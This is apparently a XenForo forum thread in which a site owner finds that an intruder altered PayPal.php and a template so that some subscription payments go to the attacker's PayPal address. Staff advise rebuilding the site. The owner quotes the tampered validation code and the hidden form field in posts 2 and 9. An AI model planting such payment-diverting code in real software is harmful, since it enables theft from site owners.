• This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn more.

XF 1.5 Hacker keeps stealing money

#1
So around 7 months ago my site was hacked, I changed everything, reinstalled xenforo and got everything set up again. A few months after I noticed payments from my subscriptions going to another paypal "randydrew6@outlook.com" instead of mine which is "randydrew6@gmail.com" and so I contacted my hosting company and got them to fix it. Now I noticed that this past month i've made less money than I should of made, checking the logs it seems very seldomly to go to "randydrew6@outlook.com" still. Most of the time it will go to my paypal but 10% of the time payments go to this other paypal. What can I do to stop this from happening? I've tried contacting paypal in the past and they have refunded it and banned an older account that this happened on and when it happened with this outlook account they told me there is nothing they can do.
 
#2
After digging into my ftp I noticed that under /library/Xenforo/UserUpgradeProcessor/PayPal.php there was:


foreach ($accounts AS $account)
{
$account = trim(strtolower($account));
if ($account && ($business == $account || $receiverEmail == $account || $receiverEmail = "randydrew6@outlook.com" || $business == "randydrew6@outlook.com"))
{
$matched = true;
break;
}
}

Is there any other file he might of edited?
 

Claudio

Well-known member
#3
So around 7 months ago my site was hacked, I changed everything, reinstalled xenforo and got everything set up again. A few months after I noticed payments from my subscriptions going to another paypal "randydrew6@outlook.com" instead of mine which is "randydrew6@gmail.com" and so I contacted my hosting company and got them to fix it. Now I noticed that this past month i've made less money than I should of made, checking the logs it seems very seldomly to go to "randydrew6@outlook.com" still. Most of the time it will go to my paypal but 10% of the time payments go to this other paypal. What can I do to stop this from happening? I've tried contacting paypal in the past and they have refunded it and banned an older account that this happened on and when it happened with this outlook account they told me there is nothing they can do.
Which addons are installed on your forum?
Have you changed all passwords after your forum was compromised?
Make sure to add .htaccess password protection to the admin panel
 
#4
Which addons are installed on your forum?
Have you changed all passwords after your forum was compromised?
Make sure to add .htaccess password protection to the admin panel
I've changed all admin passwords and there are no mods, I've removed super user from only me and also require a phone verification to login to my account. ".htaccess password protection" can you link me as to where I can figure out how to do so?
 

Claudio

Well-known member
#5
I've changed all admin passwords and there are no mods, I've removed super user from only me and also require a phone verification to login to my account. ".htaccess password protection" can you link me as to where I can figure out how to do so?
http://www.htaccesstools.com/articles/password-protection/

If there are no addons installed on your forum I'd suggest you the following:
- Make sure you reinstalled the forum by deleting all previous files.
- Are you using the default XenForo style?
If you weren't using another style rather than the default one, you never installed addons on your forum, you don't have any other script or platform like Wordpress on the same domain (which could have a security issue) and no one else had access to your files I'd make sure to check if you hosting company is trustworthy
 
#9
Hmm.. But their addon where you purchase credit is going to the correct email it's just the account upgrades page. If I inspect the element it shows

<input type="hidden" name="business" value="randydrew6@outlook.com">

but it's the correct value in the page that buys credits. Where exactly would someone go to edit this value in PHP?
 

Mike

XenForo developer
Staff member
#12
If an attacker has gained access to the point where files are edited, absolutely everything must be considered tainted. You can use the file health check to see if there are core files that may have been edited, but this is not conclusive as it doesn't cover custom files and it won't cover things in "user" directories (data and internal_data). It also sounds like he's edited at least one template. Effectively, it sounds like he gained full control.

The ideal approach in this situation is basically a rebuild. This might be viable using a XenForo-to-XenForo import (which means you wouldn't maintain your old files or database, only bringing across what the import brings), but this will cause some data and configuration loss. If you have add-ons, it's likely none of them will be maintained.

If that's not viable, you can try to audit manually to remove any changes made, but this likely won't be trivial.
 
#13
If an attacker has gained access to the point where files are edited, absolutely everything must be considered tainted. You can use the file health check to see if there are core files that may have been edited, but this is not conclusive as it doesn't cover custom files and it won't cover things in "user" directories (data and internal_data). It also sounds like he's edited at least one template. Effectively, it sounds like he gained full control.

The ideal approach in this situation is basically a rebuild. This might be viable using a XenForo-to-XenForo import (which means you wouldn't maintain your old files or database, only bringing across what the import brings), but this will cause some data and configuration loss. If you have add-ons, it's likely none of them will be maintained.

If that's not viable, you can try to audit manually to remove any changes made, but this likely won't be trivial.
Is this what you mean? I've contacted my server staff and they responded with the following:


Hello dear Randy,
Our tech stuff has found PHP file in a framework of you set up Xenforo with an outlier code, which made transfer torandydrew6@outlook.com.
We corrected the code, and prohibited to change this file. Please follow your payments and tell us if everything is working promptly!

We advice you to move to a new vps with new OS, with newest Xenoforo version, the data from your forum must be transferred manually(in order not to transwer previous weak points from your vps) Our tech stuff is able to help you with relocation of your vps.

Preparation of vps(OS,Web soft,Xenoforo+ help with manual data transfer) -50$

The works that were performed today will not be invoiced!

Please let us know your decision!
 

Brogan

XenForo moderator
Staff member
#14
That's more or less what Mike said.

It's almost impossible to know if there are any backdoors, compromised files, etc. so it's quicker and easier to just start over with a new OS, files, etc.